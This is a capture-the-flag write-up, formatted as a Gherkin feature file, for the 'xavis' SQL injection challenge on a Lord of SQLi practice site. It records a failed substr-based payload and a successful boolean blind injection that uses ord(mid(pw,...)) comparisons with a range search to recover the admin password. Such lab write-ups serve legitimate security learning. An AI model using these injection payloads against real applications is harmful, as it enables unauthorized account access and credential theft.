## Version 2.0
## language: en

Feature: xavis-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php
    """
    When I open the url with Chrome
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_xavis where id='admin' and pw=''
    """

  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
    XAVIS Clear!
    """
    When I try with the same vulnerability as orge
    """
    ('pw', '1\' || (id=\'admin\' && substr(pw,1,' + str(n)
           + ')=\'' + p + '\')-- '),
    """
    Then I get nothing trying with all the ascii table
    And I don't solve the challenge

   Scenario: Success:Sqli-boolean-exploitation
    Given that I searched through all the ascii table
    Then I realize that the password must be outside the 128 characters
    And also to pass the challenge I need the actual admin password
    Then I used the "ord" clause to get the value of the character
    And a range of numbers to minimize the number of requests
    """
    ...
    greater = '1\' or ( id=\'admin\' and ord(mid(pw,' + str(n) \
        + ',1)) > ' + str(top) + ' ) -- '
    ...
    top = 5000
    up = 5000
    top = find_greater(top,up,n,URL,HEADERS,COOKIES)
    ...
    """
    Then with a range defined I searched through that
    """
    ...
    for char in range(top, top + up):
    ...
    params = (
            ('pw', '1\' or ( id=\'admin\' and ord(mid(pw,' + str(n)
             + ',1)) = ' + str(char) + ' ) -- '),
        )
    ...
    """
    When I get "Hello admin" as result
    Then I know that the character is ok
    When I run the python script [exploit.py]
    Then I get the admin password
    And I solve the challenge
